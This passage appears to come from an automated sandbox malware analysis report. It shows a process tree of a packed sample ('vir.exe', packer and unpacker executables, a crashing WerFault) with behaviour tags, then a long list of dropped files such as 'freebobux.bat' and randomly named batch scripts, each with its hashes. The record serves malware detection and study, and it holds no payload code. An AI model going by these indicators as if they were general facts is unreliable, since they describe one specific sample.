                                                                            "C:\Users\Admin\AppData\Local\Temp\ae9fd7a0-db4e-45cc-9194-3f914dae1fa6\packer.exe" "C:\Users\Admin\AppData\Local\Temp\ae9fd7a0-db4e-45cc-9194-3f914dae1fa6\unpacker.exe" "C:\Users\Admin\AppData\Local\Temp\vir.exe" "!main.cmd" "C:\Users\Admin\AppData\Local\Temp\vir_8487f308-49f0-4714-a868-3f3fcceb6d76" "" True True False 0 -repack
                                                                            2⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            PID:3968
                                                                            • C:\Users\Admin\AppData\Local\Temp\ae9fd7a0-db4e-45cc-9194-3f914dae1fa6\ProgressBarSplash.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\ae9fd7a0-db4e-45cc-9194-3f914dae1fa6\ProgressBarSplash.exe" -packing
                                                                              3⤵
                                                                              • Executes dropped EXE
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:2592
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3968 -s 952
                                                                              3⤵
                                                                              • Loads dropped DLL
                                                                              • Program crash
                                                                              PID:2796
                                                                        • C:\Program Files\Internet Explorer\iexplore.exe
                                                                          "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
                                                                          1⤵
                                                                          • Modifies Internet Explorer settings
                                                                          • Suspicious use of FindShellTrayWindow
                                                                          • Suspicious use of SetWindowsHookEx
                                                                          • Suspicious use of WriteProcessMemory
                                                                          PID:2456
                                                                          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2456 CREDAT:275457 /prefetch:2
                                                                            2⤵
                                                                            • Manipulates Digital Signatures
                                                                            • System Location Discovery: System Language Discovery
                                                                            • NTFS ADS
                                                                            • Suspicious use of SetWindowsHookEx
                                                                            PID:1724
                                                                          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2456 CREDAT:603154 /prefetch:2
                                                                            2⤵
                                                                            • Modifies Internet Explorer settings
                                                                            • Suspicious use of SetWindowsHookEx
                                                                            PID:1532
                                                                        • C:\Windows\system32\efsui.exe
                                                                          efsui.exe /efs /keybackup
                                                                          1⤵
                                                                          • Suspicious use of FindShellTrayWindow
                                                                          • Suspicious use of SendNotifyMessage
                                                                          PID:268
                                                                        • C:\Windows\system32\AUDIODG.EXE
                                                                          C:\Windows\system32\AUDIODG.EXE 0xc0
                                                                          1⤵
                                                                            PID:1720

                                                                          Network

                                                                          MITRE ATT&CK Enterprise v15

                                                                          Replay Monitor

                                                                          Loading Replay Monitor...

                                                                          Downloads

                                                                          • C:\Program Files\Winaero Tweaker\WinaeroTweaker.exe

                                                                            Filesize

                                                                            2.9MB

                                                                            MD5

                                                                            6bb0ab3bcd076a01605f291b23ac11ba

                                                                            SHA1

                                                                            c486e244a5458cb759b35c12b342a33230b19cdf

                                                                            SHA256

                                                                            959dafbfab08f5b96d806d4ad80e4c3360759c264d3028e35483a73a89aa1908

                                                                            SHA512

                                                                            d1123feb97fbf1593ce1df687b793a41f398c9a00437e6d40331ad63b35fc7706db32a0c6f0504cff72ea2c60775b14f4c0d5a8955988048bed5ba61fa007621

                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                                                            Filesize

                                                                            342B

                                                                            MD5

                                                                            a38cec45becaa737c5b87727ea58ec7d

                                                                            SHA1

                                                                            3e190028eb48f37a827e08747f97c7687bad28a6

                                                                            SHA256

                                                                            125c414c61ea4a8099281acc16b30ede9e17ab3578be58d9bb61598ea2eb8897

                                                                            SHA512

                                                                            447f4ad539edf544d46b1eaf2ef16f565310e8b8df01dd2335c22ae782f3e673460b9dae177cca731eff86b354ad8a4ffb7349e528a819d4ce4e2976803fa098

                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                                                            Filesize

                                                                            342B

                                                                            MD5

                                                                            3ee86c797299009d43073e879ddfcc2e

                                                                            SHA1

                                                                            cf58d03dffd6d57b539457ae0c44e7ccd3d872ec

                                                                            SHA256

                                                                            fc1079e2d0930651141df513da31052f1cd4103bcfc506ba57765638c580e497

                                                                            SHA512

                                                                            4b07d8a9248fbefb05316ea2be6a2e2cd07fff967dd8343e35cf2ba34438367f8d4d862addff8af1caa2584f30a278c068d79a493e249dc8847dea85779b88ef

                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                                                            Filesize

                                                                            342B

                                                                            MD5

                                                                            958fef94a25395364b1ec78fe6114e20

                                                                            SHA1

                                                                            ce1b6aab0be36979ec23b5638a14d223af004a79

                                                                            SHA256

                                                                            13658b0e10e611fc2130b677e82a919b913a65862c93d3910a7f0c3ff137596a

                                                                            SHA512

                                                                            095201d13de7a68061d5710902ee9f5facc1f33d4bfe4c9878a00130dba9064cb871b2da17b00fc84411d45d125ba81e96c16ecd306d84add50d25241c93e0d6

                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                                                            Filesize

                                                                            342B

                                                                            MD5

                                                                            0df379024bbe0f85b7da05dc10523fdc

                                                                            SHA1

                                                                            59dc79e2c3e7779287c85d90d3b8b224c95ddb44

                                                                            SHA256

                                                                            72059659175daffbfd59547f79285bf9dba5f524877f5a3d8930236aa16f1493

                                                                            SHA512

                                                                            8f472d119be7e2ec22fa2a18b3480b0fe9e9008ef4863d9d5f372386bfcf04cb328f17855bc07458a3e16803f5f36819d7ea938d4668e5725bb0041122cf523d

                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                                                            Filesize

                                                                            342B

                                                                            MD5

                                                                            0c0994867cbeb515f1926c7cfa3f749e

                                                                            SHA1

                                                                            884284d6a1b7b8f6ce92999e3097652fd7969d47

                                                                            SHA256

                                                                            ff7f4ec8617fa61f89b9df8379bbbc7b52f832991b6693c3a5f791bb40725091

                                                                            SHA512

                                                                            7ee4f9c7746947012ca90e2f46582066408a914c298f8d44ea5d835bb24fb50fd67e800d0a9fb3bc9c0eb1c7a27b6cb08180b84518c9c9720d18664637572495

                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                                                            Filesize

                                                                            342B

                                                                            MD5

                                                                            684059dc8bd82de6752ed2aa0065b66a

                                                                            SHA1

                                                                            a2d20976eb0faafb66895a20304751c47a7cbe19

                                                                            SHA256

                                                                            daba8aa4f94f37c93f2a1d1bfaa7b56513314157993c2e9648914a6af4b1cf5b

                                                                            SHA512

                                                                            e3a50e22e896f6b320b4871f7843f2be2495285642898c397439cae36687b06d82ab00dbd89b1a23caf33ec1e8adb0e85be631dd5a3f251f7f8d103e14ae1c20

                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                                                            Filesize

                                                                            342B

                                                                            MD5

                                                                            f7dcc4f62e0b23435cc3b676544667f2

                                                                            SHA1

                                                                            e75e2274b555e2034167083519a34dbddfe84848

                                                                            SHA256

                                                                            d55049be230d1ac24b6a93028998caf2c17a8bf36663a3b8affc63c2e9ed83ef

                                                                            SHA512

                                                                            d5189e5782f751a8b51ebe42b08cf66e237b97bc78d21e5ce94d514705058faab575427ae06b3d584dc9f205c9deca3c7d5092fc2204dede6c0ddd02d97f2d4b

                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                                                            Filesize

                                                                            342B

                                                                            MD5

                                                                            666bb9b58de7a0d8b7c3af3fe6a5bd19

                                                                            SHA1

                                                                            bac56260466cbf647b5c850886115f254bddcd41

                                                                            SHA256

                                                                            0f8f1a4dc23c54fab7f48f0dd2c1dd43475ac5cd6787ddc894b6440a875ebf27

                                                                            SHA512

                                                                            10daf029e5f19077dd1b7d1b5274a90f528e632d92ce18bd0ac4423020eda37eb254018bb0369074df936edd403140071cbd5f6582809e1598499a188c96e8ef

                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                                                            Filesize

                                                                            342B

                                                                            MD5

                                                                            048f176c988236a12bdc713971ee57dd

                                                                            SHA1

                                                                            40b5d7b2972dfd44421efae46728d13a7dd5ce5c

                                                                            SHA256

                                                                            10650c4cfa0d8b98bdee3fc2fa3a785c28200efbbc67f3caa748ddafee3876b5

                                                                            SHA512

                                                                            45bca5b28e09a7a8b3e3e95de3df9a78d0948679c5c20d484ec59a5a6b4b233550516b53b9f1707a6ad434ba48417eecc32be803c74d1f4b47c0b7b6aa5178ea

                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                                                            Filesize

                                                                            342B

                                                                            MD5

                                                                            a620c7d62fb13c4de8407c80962e97d5

                                                                            SHA1

                                                                            b8b23e1dcd48b2985f10824c2e2226d789d1b3cf

                                                                            SHA256

                                                                            a693486fc81f238f3964f2f8f1fab729c211837072097878fad70fd60e64264e

                                                                            SHA512

                                                                            abe9d7a297b51a6a4047cffc1d4a8681b32a665b7e08eb1caf56db34c73d2504319075e4d849b66fa80ba8acb462ec6b8edd1653c1c2b4ba68b2efc7f48946db

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\DOMStore\4DICF1W3\www.youtube[1].xml

                                                                            Filesize

                                                                            13B

                                                                            MD5

                                                                            c1ddea3ef6bbef3e7060a1a9ad89e4c5

                                                                            SHA1

                                                                            35e3224fcbd3e1af306f2b6a2c6bbea9b0867966

                                                                            SHA256

                                                                            b71e4d17274636b97179ba2d97c742735b6510eb54f22893d3a2daff2ceb28db

                                                                            SHA512

                                                                            6be8cec7c862afae5b37aa32dc5bb45912881a3276606da41bf808a4ef92c318b355e616bf45a257b995520d72b7c08752c0be445dceade5cf79f73480910fed

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\DOMStore\4DICF1W3\www.youtube[1].xml

                                                                            Filesize

                                                                            402B

                                                                            MD5

                                                                            0e923b6f552f0a7d7527b5869883508d

                                                                            SHA1

                                                                            56a7b3195a4a20c86eec53aea312881ccb79af41

                                                                            SHA256

                                                                            42138718f4316e5ed4342ca0a8bda41d6c5a6e37eb93aa1f28872a5ce48d1293

                                                                            SHA512

                                                                            d34d0f9b7165ae93d48f9b48d9673551172657617335833d80e2d902be2ec1414fe1584fc0415034bff15cedfd68cda80c420c67655b60163e4d4db6bb8817c2

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\DOMStore\4DICF1W3\www.youtube[1].xml

                                                                            Filesize

                                                                            578B

                                                                            MD5

                                                                            09ad7ba2a8180544dd3498cf066ce4e8

                                                                            SHA1

                                                                            68b4df87ac9e86d5f0395218b222ae0da6eda847

                                                                            SHA256

                                                                            2e626382110ff5f5d5bb93f890e613218bb0d250ecb8df79568f23774f5680a1

                                                                            SHA512

                                                                            945f0d724908ae2bd1f24b479ea6b219ab2b7480470bdd339a23b2af4476877d06e5b4740e8bb0d246a0c639d015df84965a4609a37ad2f2c31b2be374e3e0d3

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\DOMStore\4DICF1W3\www.youtube[1].xml

                                                                            Filesize

                                                                            578B

                                                                            MD5

                                                                            6bccf66f6ccb0d9931bcebdb44df07a9

                                                                            SHA1

                                                                            201a0c5f08b36bbba98c6015bc176793992e716e

                                                                            SHA256

                                                                            959c36bb51a1dd294f8d602055f98f47173e21e0ab67ab4ed16315d8b3ea939e

                                                                            SHA512

                                                                            2dd4a3848761e1f2d5a5a0d19cc302a22afe0b846c4389f947a0b1d38b0f66b108d41ae883eadbb271d9a673702340ce869a30f22588fb537a399298dc282e07

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\DOMStore\4DICF1W3\www.youtube[1].xml

                                                                            Filesize

                                                                            578B

                                                                            MD5

                                                                            7a7c703fa7220cb1ddaf41111a36dd91

                                                                            SHA1

                                                                            af08f3ea91a244fca69203b1a90c0da4955ec936

                                                                            SHA256

                                                                            a13600352fed6eb179f4e248c4d2188c12d44d4c6c463bc3304b383a5cbf5258

                                                                            SHA512

                                                                            4d1929ee6276b22ff664f2c1a69b5f39908436b0b23a015672763754d710f8577e1f84720172cec1758d759b6181b3873a9e6af9411ee5a60404647fe425a383

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\DOMStore\4DICF1W3\www.youtube[1].xml

                                                                            Filesize

                                                                            578B

                                                                            MD5

                                                                            d1a94bdd3d8443cfb8dd5a2dbe644427

                                                                            SHA1

                                                                            9cbc148d1539aca463b702d6e452e7071245bf03

                                                                            SHA256

                                                                            644d5f9f609471fd1c28d9af0f4b240acbfeb4b47146b16c9ab093db06545e40

                                                                            SHA512

                                                                            ae236096ff901303f7c17bbcd75416a89dc4f260112194462a624e76df1115adf6bb7519cfcf8e7d0d3f1abcb63062010574773329a02b5fc83f488158c10892

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\DOMStore\4DICF1W3\www.youtube[1].xml

                                                                            Filesize

                                                                            2KB

                                                                            MD5

                                                                            1572c62fd38e5e6480eef3b03a2aa912

                                                                            SHA1

                                                                            db2c5c1b0cff5a359af57d80e820b432a0f8e8c2

                                                                            SHA256

                                                                            0ed8e08b987e4ca25fdd4eb3815dbf2be36c539dfb27d5378f5feb6f424b020f

                                                                            SHA512

                                                                            f56a479125c3daab0c243dba539e5f3c76dee2b0a035b63a6fd070421bea15bf5673e756d931c49321a79d2e703687a492bd650972195b01d1c4cf4df4f1ccf2

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\njqq61f\imagestore.dat

                                                                            Filesize

                                                                            18KB

                                                                            MD5

                                                                            ee4e589e0637a6c01e49eebc39b49de9

                                                                            SHA1

                                                                            9b8057e83ba570e30ae8063a4888798457eb1640

                                                                            SHA256

                                                                            66ae813997668705b7f29f6a24a167f31807aa2ae6fa9799540d3c55891c6334

                                                                            SHA512

                                                                            2899bd707b4a2c6ef11119ed5ddd04c35686436b8e32e91964e187a5d765ec4e6b9e1bade49c4b212babcea3f27721f1dd6643dc8d93a60e13caab384cd8ef10

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\7CNUR30T\4Kv5U5b1o3f[1].png

                                                                            Filesize

                                                                            610B

                                                                            MD5

                                                                            a81a5e7f71ae4153e6f888f1c92e5e11

                                                                            SHA1

                                                                            39c3945c30abff65b372a7d8c691178ae9d9eee0

                                                                            SHA256

                                                                            2bc7a47889c56ad49f1b8b97385d5a4d212e79bb8a9b30df0665a165f58b273e

                                                                            SHA512

                                                                            1df32349b33f6a6fcb1f8b6093abd737fa0638cdd6e3fd90a7e1852bd0e40bc2633cb4e13c4824fb948d1e012e5cb9eed0b038b121404865495d4e57e123db69

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D6V88JEY\favicon_a_eupayfgghqiai7k9sol6lg2[1].ico

                                                                            Filesize

                                                                            16KB

                                                                            MD5

                                                                            12e3dac858061d088023b2bd48e2fa96

                                                                            SHA1

                                                                            e08ce1a144eceae0c3c2ea7a9d6fbc5658f24ce5

                                                                            SHA256

                                                                            90cdaf487716184e4034000935c605d1633926d348116d198f355a98b8c6cd21

                                                                            SHA512

                                                                            c5030c55a855e7a9e20e22f4c70bf1e0f3c558a9b7d501cfab6992ac2656ae5e41b050ccac541efa55f9603e0d349b247eb4912ee169d44044271789c719cd01

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EOYL2MRI\favicon[2].ico

                                                                            Filesize

                                                                            14KB

                                                                            MD5

                                                                            f210fc0564ae5a5a2985b2848e75cba2

                                                                            SHA1

                                                                            29bf0540e4c291cc6c6d071ac8125cc65314fbe9

                                                                            SHA256

                                                                            d453748d5f8e5bb6c62791b97c733dba1d7dc3340bde957470285b2a7185b7ec

                                                                            SHA512

                                                                            46fac4e98cc34105d74a8a159c70d48191612f88e5ab1a7ee7276e7b2c95407d71d307509ef8b9f0aed28465688839f49b2a55da4b03f7d01b3f03c908067e8c

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EOYL2MRI\favicon[3].ico

                                                                            Filesize

                                                                            5KB

                                                                            MD5

                                                                            f3418a443e7d841097c714d69ec4bcb8

                                                                            SHA1

                                                                            49263695f6b0cdd72f45cf1b775e660fdc36c606

                                                                            SHA256

                                                                            6da5620880159634213e197fafca1dde0272153be3e4590818533fab8d040770

                                                                            SHA512

                                                                            82d017c4b7ec8e0c46e8b75da0ca6a52fd8bce7fcf4e556cbdf16b49fc81be9953fe7e25a05f63ecd41c7272e8bb0a9fd9aedf0ac06cb6032330b096b3702563

                                                                          • C:\Users\Admin\AppData\Local\Psiphon3\psicash\psicashdatastore.prod

                                                                            Filesize

                                                                            4B

                                                                            MD5

                                                                            5ad5cc4d26869082efd29c436b57384a

                                                                            SHA1

                                                                            693dad7d164d27329c43b1c1bff4b271013514f5

                                                                            SHA256

                                                                            c5c24f7ca1c946fa4dfd44407409c8e11ec6e41f0e1c7c45bf8381b42afb31f1

                                                                            SHA512

                                                                            36efc511a98e53031d52dacdd40292a46fe5eab0194a0e9512f778f88b84fac5aac1eebb6e281c44e40ef2ddc3cdea41df7f5a50e4024cd86c087ed909fe8629

                                                                          • C:\Users\Admin\AppData\Local\Psiphon3\psicash\psicashdatastore.prod.2.commit

                                                                            Filesize

                                                                            252B

                                                                            MD5

                                                                            27acf211c37abdc9088b197d08bec8cf

                                                                            SHA1

                                                                            1eeac5d37fc21f44c57cd4b3e9193a544e95f557

                                                                            SHA256

                                                                            101ca992b5048903b99cb7c996b09469cc93e33b847d338f8a2f9fc05b6c42ca

                                                                            SHA512

                                                                            2ddb8699b65317d59d49cb29b2739bdfc6d0bb99a6b36e1d7b3d0a2bf92916ea13e488413e84b2b0929bfa6d1c4ddbbb720b863abecc21c0e6a4efcfaa1b7919

                                                                          • C:\Users\Admin\AppData\Local\Psiphon3\psicash\psicashdatastore.prod.2.commit

                                                                            Filesize

                                                                            1KB

                                                                            MD5

                                                                            f7065c51debd1b86a1701b054ef8dbaa

                                                                            SHA1

                                                                            a5dfafad60ba72a3e9cd3480668ef55afdd61ab5

                                                                            SHA256

                                                                            c5b424a6c71ebc0e37762ada8327ebf441fb659cfeaa68a5e3ad83395940e088

                                                                            SHA512

                                                                            023aec14250a02be6ee0b77cd50838116aad6465de17006bd658b636c71ed742d7ae121387c42bc6ed5a87aa3208f748b831c05741eed2d01192f270a97c0fb1

                                                                          • C:\Users\Admin\AppData\Local\Psiphon3\psicash\psicashdatastore.prod.2.commit

                                                                            Filesize

                                                                            594B

                                                                            MD5

                                                                            14cde16a4fa7348b28c65585b571b1bd

                                                                            SHA1

                                                                            f80e761d734846cfb13b7ca2119d425c36abdb42

                                                                            SHA256

                                                                            8eeb5fef0334fbfe08c6f8a5622d2b4c18bc3fa2d2ba72d5d837ec3aedc55af5

                                                                            SHA512

                                                                            c1d545371a0ca6b4b4777f1286f99f7ea27232e3266a5bf35fbb1f11baf3dae3645041c658705ddecdf4328df9e04ae053852a779cb2f2d4af676d8fd2d232f3

                                                                          • C:\Users\Admin\AppData\Local\Psiphon3\psicash\psicashdatastore.prod.2.commit

                                                                            Filesize

                                                                            1KB

                                                                            MD5

                                                                            99d4e6b1fb5cc455363c548499efb432

                                                                            SHA1

                                                                            8ac93112ce9e3547586cb4b7a582a7a83245dcc1

                                                                            SHA256

                                                                            3dcd94b95330526fb994e89abe0decceb1a40dcce6758bce8a0bcdc09950cf00

                                                                            SHA512

                                                                            6b6f66a2562a1ced63853793266ab447b948de5b0ad23ea1cf42705e341c9193ef43dc2e228cd89fa5e27afe086d63fb4b8cab7c28b34e3bb625260b36f85ab7

                                                                          • C:\Users\Admin\AppData\Local\Psiphon3\psicash\psicashdatastore.prod.2.commit

                                                                            Filesize

                                                                            115B

                                                                            MD5

                                                                            acac682f268e1eebe74a9c8c6d3d576f

                                                                            SHA1

                                                                            8fd39b257b11c360d69a4d302fb17daf842c482c

                                                                            SHA256

                                                                            c59e308587e3e485a58834fafb65b20ce9eeb697c3ab5d23d476aa89e3ae6566

                                                                            SHA512

                                                                            16e7cf6776941a24af0f664bc36579ed763a1986d75ca7b43ce5c3951eef05306fbbff26460c84fd102e973562a4602db8c71e7c2de77f99b51c544c9fb384e9

                                                                          • C:\Users\Admin\AppData\Local\Psiphon3\psicash\psicashdatastore.prod.2.commit

                                                                            Filesize

                                                                            276B

                                                                            MD5

                                                                            3f94060b5cc43099675e432aee827de6

                                                                            SHA1

                                                                            07850b80b5ab8201b20ad9379b7be25534ebf238

                                                                            SHA256

                                                                            409d859bb33a48077c47e0a47b52e7b191a403e5c7ea1cc914ea7d235987c481

                                                                            SHA512

                                                                            44b96f8be89e81e32aa98191220e9d924de6d3b75448cf41e880c3b42fdeb4474b4d9d0d8f731e5680bbf1397ef4fbd04a98e8b71f77ffceffa9f20cfba0acc0

                                                                          • C:\Users\Admin\AppData\Local\Psiphon3\psicash\psicashdatastore.prod.2.commit

                                                                            Filesize

                                                                            1KB

                                                                            MD5

                                                                            ad0786fdfd2b740058725c2674dbc6c7

                                                                            SHA1

                                                                            2a4268680a51c0815f23675b27be8df982c3d052

                                                                            SHA256

                                                                            412ebde3c458bd791b32e458bad6bcfde5b4599ed86623a43d7befe1369dec67

                                                                            SHA512

                                                                            37c2eeefefe1e4f54414c446cb87fad8321fea22ff62e503448a73ec1fccc297ceae5a713d12d614f713e1e57591b37673c89a5373420a6ed79c41e03c2f73d3

                                                                          • C:\Users\Admin\AppData\Local\Temp\58CA.tmp\freebobux.bat

                                                                            Filesize

                                                                            176B

                                                                            MD5

                                                                            202d76eb2952aeb2e241c13defe48045

                                                                            SHA1

                                                                            34e26a3407288c7ea63bd1cd305c27b06b163386

                                                                            SHA256

                                                                            9d99aa3263624e3a9434af76bac620f71598c082b35504de738d1c04af079fab

                                                                            SHA512

                                                                            6a78847878c3ee4ef82a61d03e4f61f681ad7c2d62d5ff10645f17fa2acf63bc76b5862043bb94eaf7d80ce0ab2c35a904ef6de178623d42111c453c5ee9f3d3

                                                                          • C:\Users\Admin\AppData\Local\Temp\CWbSyF4H5JNy.bat

                                                                            Filesize

                                                                            195B

                                                                            MD5

                                                                            f12f0f95e0f737a8964ba4c01c00b45d

                                                                            SHA1

                                                                            6d52cf462364a8771fc5ecfcc5ae40d3d2a96af6

                                                                            SHA256

                                                                            d93b93f4c2e14a83b528245e4adc82489d320d1d3b0eb81306568877d543f477

                                                                            SHA512

                                                                            fe67cb0eb7b028591955dda05d036a67a527d50b6591e6278ec2238d3670e78be06fd0b0e8758f242ec87aca8d852d0da59693aa83d52a4f9648d4fac2c0aa96

                                                                          • C:\Users\Admin\AppData\Local\Temp\Cab3B4D.tmp

                                                                            Filesize

                                                                            70KB

                                                                            MD5

                                                                            49aebf8cbd62d92ac215b2923fb1b9f5

                                                                            SHA1

                                                                            1723be06719828dda65ad804298d0431f6aff976

                                                                            SHA256

                                                                            b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

                                                                            SHA512

                                                                            bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

                                                                          • C:\Users\Admin\AppData\Local\Temp\EPJXV115NJdj.bat

                                                                            Filesize

                                                                            195B

                                                                            MD5

                                                                            bbf5e319ccbc29b49f6373eba6f866db

                                                                            SHA1

                                                                            dad89e4ef28f786c862a8ba141003c481e9103fa

                                                                            SHA256

                                                                            9d1310c4f12803811c316e6a7749cfcb2ab964d8c78c3598e398a0506c64ba47

                                                                            SHA512

                                                                            6d360a72f845a12aa51efae52f015d4329324bd8b69b9e41125db5cba13cd0097cc5365003de0c5b4fbdc238352292588453bbf75bb962699988786172d07569

                                                                          • C:\Users\Admin\AppData\Local\Temp\G1509kuP5KKh.bat

                                                                            Filesize

                                                                            195B

                                                                            MD5

                                                                            9218fe89b7711fe008790d35caff529f

                                                                            SHA1

                                                                            f4c88d4b12f25c14d8a65faf5bfdb83658d9d1bc

                                                                            SHA256

                                                                            f888718921589f9ceae7299ee01eef48746207e47c58abada6c7492a3af52a22

                                                                            SHA512

                                                                            3faa4697b964ae3ccf4304a1351e359ba6cf7a5042fb31da28ae6b5da1e7417f6093bbd1610a94c4fe4a532396006008fc8e85deb305df7c3aa8412e82d7ae86

                                                                          • C:\Users\Admin\AppData\Local\Temp\HTMrQNSHs6H8.bat

                                                                            Filesize

                                                                            195B

                                                                            MD5

                                                                            7b37ae5281c720496bcf5f014b851617

                                                                            SHA1

                                                                            709fd094ae6145f623f74d1370b010ed0437ce3f

                                                                            SHA256

                                                                            6e94e720f425553c6990265aeacbfba005b3346cae16254d387977ae2b64e302

                                                                            SHA512

                                                                            c340bb709cfe8e3576f9421119d8fa0d0fb319f31ba07e3bdd32fcdeb2a618b1530e68a9c4745d8383c5de83529631b3c803467c7c471c45c945315198238afe

                                                                          • C:\Users\Admin\AppData\Local\Temp\LA41oKjcaDvN.bat

                                                                            Filesize

                                                                            195B

                                                                            MD5

                                                                            ddaf42347b5248f15a56098b4a7871b2

                                                                            SHA1

                                                                            552bcb50fd87499574ae5b2e524d60d73528f889

                                                                            SHA256

                                                                            bba5602b18afe346a5354db36292f3d130f89af10b694dc0a7cbc08bec40fc8f

                                                                            SHA512

                                                                            dac819dfeca9bfab88e618abe23fa60c8d921a971fa1db7038ebfa0c6a2111b45034e8e059dfc0ea0af9a33b5a0cf1a018f5f8bf74816b167e811eb603457671

                                                                          • C:\Users\Admin\AppData\Local\Temp\Tar4BC2.tmp

                                                                            Filesize

                                                                            181KB

                                                                            MD5

                                                                            4ea6026cf93ec6338144661bf1202cd1

                                                                            SHA1

                                                                            a1dec9044f750ad887935a01430bf49322fbdcb7

                                                                            SHA256

                                                                            8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

                                                                            SHA512

                                                                            6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

                                                                          • C:\Users\Admin\AppData\Local\Temp\WBmF0OekAjxC.bat

                                                                            Filesize

                                                                            195B

                                                                            MD5

                                                                            a872965f2d583ed1765cf6176dc1916c

                                                                            SHA1

                                                                            e53ecd8cb458fb30ef4bf426b483db396522ea21

                                                                            SHA256

                                                                            e85d12c017174961cf929f3a657457510eb492f8cf0417ac5d3df5e545b19534

                                                                            SHA512

                                                                            160105c27507bc629f5f21c816015caa54525d137c10276ab7afb26401b3606caf2451ae6fbd4a2543de926016750ad3c51fb84beb0a8fccc906053f6fe20369

                                                                          • C:\Users\Admin\AppData\Local\Temp\ZqHlI4YblzOb.bat

                                                                            Filesize

                                                                            195B

                                                                            MD5

                                                                            d0b1298ff8bc4d57bdff2628ac2dcb62

                                                                            SHA1

                                                                            2663840b4d610f68de07f8378028e0e747d703b2

                                                                            SHA256

                                                                            a163c0a30b05878e145f0707ca6107d6e632e58394214de0baeeede7a163b76b

                                                                            SHA512

                                                                            7d92b0b54ad7244e2f5576f728fa61cdfd3ca94dc9335e9c93b0ccebe3a2adb1166631828c9cfece026d8e459817753c6ac458849ffc477a9607681ede91534a

                                                                          • C:\Users\Admin\AppData\Local\Temp\ae9fd7a0-db4e-45cc-9194-3f914dae1fa6\packer.exe

                                                                            Filesize

                                                                            50KB

                                                                            MD5

                                                                            dfda8e40e4c0b4830b211530d5c4fefd

                                                                            SHA1

                                                                            994aca829c6adbb4ca567e06119f0320c15d5dba

                                                                            SHA256

                                                                            131fc2c07992321f9ba4045aba20339e122bab73609d41dd7114f105f77f572e

                                                                            SHA512

                                                                            104e64d6dd2fd549c22cd36a4be83ccb2e0c85f5cc6d88ba2729b3c7e5d5f50cd244053c8cb3bdd5e294d1a4a1964825f3a7b7df83ee855615019dfc2b49f43f

                                                                          • C:\Users\Admin\AppData\Local\Temp\ffLlPYeX4auy.bat

                                                                            Filesize

                                                                            195B

                                                                            MD5

                                                                            500212a331332c464a3cc6fe84f095a6

                                                                            SHA1

                                                                            9456328f52a0800b66c2c7d3323034f0278efe9b

                                                                            SHA256

                                                                            34049058b4af3e92bf15564c83a89d2a929b9228b73aaeccf6ad691578f49532

                                                                            SHA512

                                                                            3aa1b9093e662422e63283d6ffc86893bf3c06989f04d9a1bbb2e065c4b7ab433ce5d346df25b77087b88d57ef68dabbcddfad23f23964481ff0d1d75df482ab

                                                                          • C:\Users\Admin\AppData\Local\Temp\iksE1Cftvgyj.bat

                                                                            Filesize

                                                                            195B

                                                                            MD5

                                                                            7a037e8297545e64143165d9fc71833f

                                                                            SHA1

                                                                            c9a381416a8088962036f4ae7458fcebe4b3c4de

                                                                            SHA256

                                                                            7f919c0caae222777fa9a178417c0a21c92356387c9f230b7e4a880bb309b1e5

                                                                            SHA512

                                                                            d4f0ee6b40c1aa31277047fe68209d4d128ed8d4b2965feb510b7912f524d0161159456308a591a5996ec1c6dfc21d733d9f63933589de1d0a039cae15884372

